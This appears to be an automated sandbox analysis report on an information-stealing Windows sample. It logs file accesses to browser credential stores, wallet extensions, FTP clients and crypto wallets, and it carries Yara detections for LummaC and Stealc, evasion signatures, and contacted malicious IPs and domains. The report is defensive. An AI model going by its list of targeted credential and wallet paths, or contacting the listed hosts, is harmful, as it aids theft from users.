Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Searches for user specific document files
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\IPKGELNTQY Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NVWZAPQSQL Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\IPKGELNTQY Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NVWZAPQSQL Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\IPKGELNTQY Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NVWZAPQSQL Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\IPKGELNTQY Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\NVWZAPQSQL Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\IPKGELNTQY Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\NVWZAPQSQL Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\IPKGELNTQY Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\NVWZAPQSQL Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\NVWZAPQSQL Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: number of queries: 1403
Yara detected Credential Stealer
Source: Yara match File source: 0000000A.00000003.2944432729.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.3131133881.00000000018DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2173743072.0000000001567000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2911175052.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2218579742.0000000001538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2218352412.0000000001560000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 1880, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 58ce8f976c.exe PID: 6068, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 58ce8f976c.exe PID: 504, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Credential Flusher
Source: Yara match File source: Process Memory Space: 760934cb92.exe PID: 7144, type: MEMORYSTR
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 1880, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 58ce8f976c.exe PID: 6068, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 58ce8f976c.exe PID: 504, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Stealc
Source: Yara match File source: 32.2.num.exe.bf0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.0.num.exe.bf0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.0.num.exe.bf0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.7451ae0b11.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.7451ae0b11.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000020.00000002.3135249068.0000000000BF1000.00000080.00000001.01000000.0000001A.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2960373733.0000000004BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.3127862196.0000000004BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.3268929874.0000000000141000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.3144922950.000000000163E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3001129617.0000000000141000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000000.3116653245.0000000000BF1000.00000080.00000001.01000000.0000001A.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.3280933460.0000000000BF1000.00000080.00000001.01000000.0000001A.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3004186690.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.3274363852.0000000000F8B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 7451ae0b11.exe PID: 6196, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\num[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1545100 Sample: file.exe Startdate: 30/10/2024 Architecture: WINDOWS Score: 100 93 thumbystriw.store 2->93 95 presticitpo.store 2->95 97 34 other IPs or domains 2->97 119 Suricata IDS alerts for network traffic 2->119 121 Found malware configuration 2->121 123 Antivirus detection for dropped file 2->123 125 16 other signatures 2->125 9 skotes.exe 4 25 2->9         started        14 file.exe 2 2->14         started        16 58ce8f976c.exe 2->16         started        18 4 other processes 2->18 signatures3 process4 dnsIp5 113 185.215.113.43, 49991, 49992, 49996 WHOLESALECONNECTIONSNL Portugal 9->113 77 C:\Users\user\AppData\Local\Temp\...\num.exe, PE32 9->77 dropped 79 C:\Users\user\AppData\...\760934cb92.exe, PE32 9->79 dropped 81 C:\Users\user\AppData\...\7451ae0b11.exe, PE32 9->81 dropped 91 5 other malicious files 9->91 dropped 169 Creates multiple autostart registry keys 9->169 171 Hides threads from debuggers 9->171 173 Tries to detect sandboxes / dynamic malware analysis system (registry check) 9->173 20 58ce8f976c.exe 2 9->20         started        24 7451ae0b11.exe 9->24         started        27 760934cb92.exe 9->27         started        29 num.exe 9->29         started        115 necklacedmny.store 188.114.96.3, 443, 49709, 49711 CLOUDFLARENETUS European Union 14->115 117 185.215.113.16, 49760, 49993, 49997 WHOLESALECONNECTIONSNL Portugal 14->117 83 C:\...\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe, PE32 14->83 dropped 85 C:\Users\user\...\7YW0363WEKP7ULOI0QRA.exe, PE32 14->85 dropped 175 Query firmware table information (likely to detect VMs) 14->175 177 Found many strings related to Crypto-Wallets (likely being stolen) 14->177 179 Tries to evade debugger and weak emulator (self modifying code) 14->179 189 2 other signatures 14->189 31 S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe 4 14->31         started        33 7YW0363WEKP7ULOI0QRA.exe 9 1 14->33         started        87 C:\Users\user\...\ZVNI3QDRJUMHB5ZEQG5Z2C.exe, PE32 16->87 dropped 89 C:\...\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe, PE32 16->89 dropped 181 Tries to harvest and steal ftp login credentials 16->181 183 Tries to harvest and steal browser information (history, passwords, etc) 16->183 185 Tries to steal Crypto Currency Wallets 16->185 35 ZVNI3QDRJUMHB5ZEQG5Z2C.exe 16->35         started        37 8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe 16->37         started        187 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 18->187 39 7 other processes 18->39 file6 signatures7 process8 dnsIp9 71 C:\Users\...\W7N881PI98FKFOKWDI7HCS7W.exe, PE32 20->71 dropped 73 C:\Users\user\...\DP4Z2JGIRNCYT3CKHONMY.exe, PE32 20->73 dropped 127 Antivirus detection for dropped file 20->127 129 Multi AV Scanner detection for dropped file 20->129 131 Query firmware table information (likely to detect VMs) 20->131 147 2 other signatures 20->147 41 W7N881PI98FKFOKWDI7HCS7W.exe 20->41         started        44 DP4Z2JGIRNCYT3CKHONMY.exe 20->44         started        105 185.215.113.206, 50005, 80 WHOLESALECONNECTIONSNL Portugal 24->105 149 3 other signatures 24->149 133 Binary is likely a compiled AutoIt script file 27->133 46 taskkill.exe 27->46         started        48 taskkill.exe 27->48         started        50 taskkill.exe 27->50         started        57 3 other processes 27->57 75 C:\Users\user\AppData\Local\...\skotes.exe, PE32 31->75 dropped 135 Detected unpacking (changes PE section rights) 31->135 137 Machine Learning detection for dropped file 31->137 139 Tries to evade debugger and weak emulator (self modifying code) 31->139 52 skotes.exe 31->52         started        141 Modifies windows update settings 33->141 143 Disables Windows Defender Tamper protection 33->143 151 3 other signatures 33->151 145 Tries to detect sandboxes and other dynamic analysis tools (window names) 35->145 107 youtube.com 142.250.184.206 GOOGLEUS United States 39->107 109 prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82 GOOGLEUS United States 39->109 111 4 other IPs or domains 39->111 54 firefox.exe 39->54         started        59 7 other processes 39->59 file10 signatures11 process12 dnsIp13 153 Multi AV Scanner detection for dropped file 41->153 155 Tries to evade debugger and weak emulator (self modifying code) 41->155 157 Hides threads from debuggers 41->157 159 Tries to detect sandboxes / dynamic malware analysis system (registry check) 44->159 161 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 44->161 61 conhost.exe 46->61         started        63 conhost.exe 48->63         started        65 conhost.exe 50->65         started        163 Antivirus detection for dropped file 52->163 165 Detected unpacking (changes PE section rights) 52->165 167 Machine Learning detection for dropped file 52->167 99 push.services.mozilla.com 34.107.243.93 GOOGLEUS United States 54->99 101 telemetry-incoming.r53-2.services.mozilla.com 34.120.208.123 GOOGLEUS United States 54->101 103 2 other IPs or domains 54->103 67 conhost.exe 57->67         started        69 conhost.exe 57->69         started        signatures14 process15
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.43
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
34.149.100.209
 prod.remote-settings.prod.webservices.mozgcp.net United States
2686 ATGS-MMD-ASUS false
185.215.113.16
 unknown Portugal
206894 WHOLESALECONNECTIONSNL false
34.107.243.93
 push.services.mozilla.com United States
15169 GOOGLEUS false
34.107.221.82
 prod.detectportal.prod.cloudops.mozgcp.net United States
15169 GOOGLEUS false
35.244.181.201
 prod.balrog.prod.cloudops.mozgcp.net United States
15169 GOOGLEUS false
34.117.188.166
 contile.services.mozilla.com United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
188.114.96.3
 necklacedmny.store European Union
13335 CLOUDFLARENETUS true
185.215.113.206
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
35.190.72.216
 prod.classify-client.prod.webservices.mozgcp.net United States
15169 GOOGLEUS false
34.160.144.191
 prod.content-signature-chains.prod.webservices.mozgcp.net United States
2686 ATGS-MMD-ASUS false
142.250.184.206
 youtube.com United States
15169 GOOGLEUS false
34.120.208.123
 telemetry-incoming.r53-2.services.mozilla.com United States
15169 GOOGLEUS false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
example.org 93.184.215.14 true
star-mini.c10r.facebook.com 157.240.251.35 true
prod.classify-client.prod.webservices.mozgcp.net 35.190.72.216 true
prod.balrog.prod.cloudops.mozgcp.net 35.244.181.201 true
twitter.com 104.244.42.129 true
prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82 true
dyna.wikimedia.org 185.15.59.224 true
prod.remote-settings.prod.webservices.mozgcp.net 34.149.100.209 true
contile.services.mozilla.com 34.117.188.166 true
youtube.com 142.250.184.206 true
prod.content-signature-chains.prod.webservices.mozgcp.net 34.160.144.191 true
youtube-ui.l.google.com 172.217.16.142 true
reddit.map.fastly.net 151.101.129.140 true
us-west1.prod.sumo.prod.webservices.mozgcp.net 34.149.128.2 true
ipv4only.arpa 192.0.0.171 true
prod.ads.prod.webservices.mozgcp.net 34.117.188.166 true
push.services.mozilla.com 34.107.243.93 true
necklacedmny.store 188.114.96.3 true
